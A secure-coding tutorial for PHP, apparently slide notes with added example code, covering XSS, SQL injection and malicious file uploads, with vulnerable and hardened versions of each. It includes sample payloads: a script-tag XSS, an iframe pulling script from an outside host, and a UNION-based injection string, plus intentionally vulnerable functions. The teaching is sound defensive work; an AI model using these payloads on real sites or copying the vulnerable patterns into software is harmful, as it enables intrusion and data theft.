Secure Web App Programming in PHP
Akash Mahajan, v1.0
Cross Site Scripting - XSS
Injecting HTML/JS into the site.
Non-persistent / Reflected / First Order: the script is taken from the request and displayed in the browser directly.
  example.com/search?q=<script>alert('hi');</script>
  example.com/index.php?lang=path to php shell
Persistent / Stored / Second Order: the first-name field of a registration form is vulnerable and the value is stored in the database.
  Hello <iframe src=http://f1y.in/0.js></iframe>
DOM Based: no example; mentioned by Amit Klein in his paper "XSS of the Third Kind".
XSS mitigation in PHP
Sanitize all globals ($_GET, $_POST, $_COOKIE).
Use strip_tags().
Use the Inspekt library: code.google.com/p/inspekt
Escape everything before displaying it: htmlentities(), htmlspecialchars().
Client headers like User-Agent can be malicious as well.
Rule of thumb: if it's not your data, consider it bad. If you can verify it, consider it trusted good data.
Whitelisting helps in verifying good data more than blacklisting.
See examples at xssed.com
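The reflected cases from the previous slides, hardened the way this slide describes: an allow-list for the `lang` selector and output escaping for the echoed search term and the User-Agent header. This is an added example, not code from the deck; the file names in ALLOWED_LANGS and the function names are hypothetical.

```php
<?php
// Added example (not from the deck): hardening the two reflected inputs the
// deck shows, search?q= and index.php?lang=. Names are hypothetical.

declare(strict_types=1);

// Allow-list for ?lang=: the value only ever selects one of these files,
// so a path to an uploaded PHP shell can never reach include().
const ALLOWED_LANGS = ['en' => 'lang/en.php', 'de' => 'lang/de.php'];

function langFile(?string $lang): string
{
    // Any value that is not an exact key of the allow-list falls back to English.
    return ALLOWED_LANGS[$lang ?? ''] ?? ALLOWED_LANGS['en'];
}

// Output encoding for text placed in an HTML element body or a double-quoted
// attribute. ENT_QUOTES also encodes ' so single-quoted attributes are covered;
// naming the charset avoids encoding tricks that bypass the escaper.
function h(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Vulnerable: echoes the raw query string straight back into the page.
function renderSearchVulnerable(string $q): string
{
    return "<p>Results for: $q</p>";
}

// Hardened: same page, every untrusted value passes through h(), including
// the User-Agent header, which the slide notes can be malicious too.
function renderSearchHardened(string $q, string $userAgent): string
{
    return "<p>Results for: " . h($q) . "</p>\n"
         . "<p class=\"debug\" data-ua=\"" . h($userAgent) . "\"></p>";
}

// Demo with the deck's own payload, constructed here rather than read from $_GET.
$q  = "<script>alert('hi');</script>";
$ua = "Mozilla/5.0\"><script>alert('hi');</script>";   // constructed hostile User-Agent

echo renderSearchVulnerable($q), "\n";        // the script tag lands in the page verbatim
echo renderSearchHardened($q, $ua), "\n";     // &lt;script&gt;... and &quot;-escaped attribute
echo langFile('../some/other/file.php'), "\n"; // prints lang/en.php: not on the allow-list
```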
SQL Injection
Allowing SQL to be injected into the database query. The most common attack points are the search of any dynamic website and registration forms. These two will definitely be talking to the database.
  $sql = "SELECT * FROM table WHERE id = '" . $_REQUEST['id'] . "'";
  id = ' OR 1 UNION ALL SELECT * FROM table;
Excellent examples: http://google.com/search?q=site:slideshare.net sql injection
SQL Injection - Mitigation
mysql_real_escape_string():
  $dbquery = sprintf("SELECT name FROM user WHERE id='%s'", mysql_real_escape_string($_REQUEST['id']));
Parameterized queries (mysqli prepared statement):
  $stmt = $mysqli->prepare("SELECT name FROM user WHERE id=?");
  $stmt->bind_param("i", $id);
  $stmt->execute();
The standard mysql module in PHP doesn't allow parameterized queries. You need mysqli.
Stored procedures: see a kickass example of a stored proc used to hack more than a hundred thousand websites: http://www.breach.com/resources/breach-security-labs/alerts/mass-sql-injection-attack-evolutio
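The three variants from this slide side by side for the `id` lookup, with the escaping caveat the slide's `'%s'` quoting relies on made explicit. This is an added example, not the deck's code; it assumes a MySQL `user` table with an integer `id` column, the mysqlnd driver (for `get_result()`), and placeholder credentials.

```php
<?php
// Added example (not from the deck). Assumes a user table with an integer id
// column, mysqlnd for get_result(), and placeholder connection details.

declare(strict_types=1);

// Vulnerable: the deck's string concatenation. With the deck's payload
// ' OR 1 UNION ALL SELECT * FROM table; the quote closes the literal and
// everything after it is parsed as SQL.
function findNameVulnerable(mysqli $db, string $id): ?string
{
    $sql = "SELECT name FROM user WHERE id = '" . $id . "'";
    $row = $db->query($sql)->fetch_assoc();
    return $row['name'] ?? null;
}

// Escaping is only correct while the value sits inside quotes in the SQL text
// and the connection charset is set; real_escape_string() is the mysqli twin
// of the deck's mysql_real_escape_string().
function findNameEscaped(mysqli $db, string $id): ?string
{
    $sql = sprintf("SELECT name FROM user WHERE id = '%s'", $db->real_escape_string($id));
    $row = $db->query($sql)->fetch_assoc();
    return $row['name'] ?? null;
}

// Prepared statement: the SQL text is parsed first and the value travels
// separately, so it can never be reinterpreted as SQL whatever it contains.
function findNamePrepared(mysqli $db, string $id): ?string
{
    if (!ctype_digit($id)) {          // id is an integer column: validate the shape up front
        return null;
    }
    $stmt = $db->prepare("SELECT name FROM user WHERE id = ?");
    $stmt->bind_param("i", $id);      // 'i' binds the value as an integer
    $stmt->execute();
    $row = $stmt->get_result()->fetch_assoc();
    return $row['name'] ?? null;
}

$mysqli = new mysqli('localhost', 'app', 'secret', 'appdb');   // placeholder credentials
$mysqli->set_charset('utf8mb4');   // escaping is only safe for the charset the connection uses

$payload = "' OR 1 UNION ALL SELECT * FROM table;";   // the deck's payload, constructed here
var_dump(findNamePrepared($mysqli, $payload));         // NULL: rejected before any query runs
var_dump(findNamePrepared($mysqli, "42"));             // the name for id 42, or NULL
```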
File Uploads
Web apps add a directory in the document root for storing file uploads and give it write access. They don't randomize filenames. So a specially crafted image file which has PHP code written in it gets saved there. The malicious user is now free to call it using a GET request, and it gets executed.
http://www.scanit.be/uploads/php-file-upload.pdf
File Uploads - Mitigation
The usual use case is uploading image files. Use getimagesize() to get the correct MIME type of the file from the file header.
Generate a random file name:
  $rand = time() . substr(md5(microtime()), 0, rand(5, 12));
Return $rand and append the file extension.
Ideally noexec permission should be set on the directory where files are copied to.
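The mitigation steps above as one upload handler, added here as an example rather than taken from the deck. It assumes an upload directory outside the document root (the placeholder UPLOAD_DIR) that is writable by the web server and mounted noexec, and it uses random_bytes() rather than the deck's md5(microtime()) as the randomness source.

```php
<?php
// Added example (not from the deck): the slide's upload-hardening steps as one
// function. UPLOAD_DIR is a placeholder path outside the document root.

declare(strict_types=1);

const UPLOAD_DIR = '/srv/app-data/uploads';   // placeholder; not under the web root, mounted noexec

// The extension comes from the detected image type, never from the client's
// filename, so an upload named anything.php can only be stored as .jpg/.png/.gif.
const ALLOWED_TYPES = [
    IMAGETYPE_JPEG => 'jpg',
    IMAGETYPE_PNG  => 'png',
    IMAGETYPE_GIF  => 'gif',
];

// Takes one $_FILES entry; returns the stored name, or null when rejected.
function storeImageUpload(array $file): ?string
{
    if (($file['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK) {
        return null;
    }
    if (!is_uploaded_file($file['tmp_name'])) {   // only trust files PHP itself received
        return null;
    }
    // getimagesize() reads the header, not the client-supplied Content-Type.
    // A real image with PHP code appended still passes this check (the deck's
    // threat), which is why the extension and noexec directory below matter.
    $info = @getimagesize($file['tmp_name']);
    if ($info === false || !isset(ALLOWED_TYPES[$info[2]])) {
        return null;
    }
    $ext = ALLOWED_TYPES[$info[2]];

    // Random name (the deck: time() . substr(md5(microtime()), 0, rand(5, 12));
    // random_bytes() is used here as an unpredictable source).
    $name = bin2hex(random_bytes(16)) . '.' . $ext;
    $dest = UPLOAD_DIR . '/' . $name;

    if (!move_uploaded_file($file['tmp_name'], $dest)) {
        return null;
    }
    chmod($dest, 0640);   // stored data, not a script: no execute bit
    return $name;
}

// Usage in the upload handler, for a form field named "photo":
// $stored = storeImageUpload($_FILES['photo'] ?? []);
```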
Endgame
At this point you have reasonably ensured that your PHP web application is not compromised. But the users connecting to your website are still vulnerable to session hijacking, CSRF from your site, etc.
There are workarounds to the standard PHP functions, like this one for mysql_real_escape_string():
http://shiflett.org/blog/2006/jan/addslashes-versus-mysql-real-escape-string
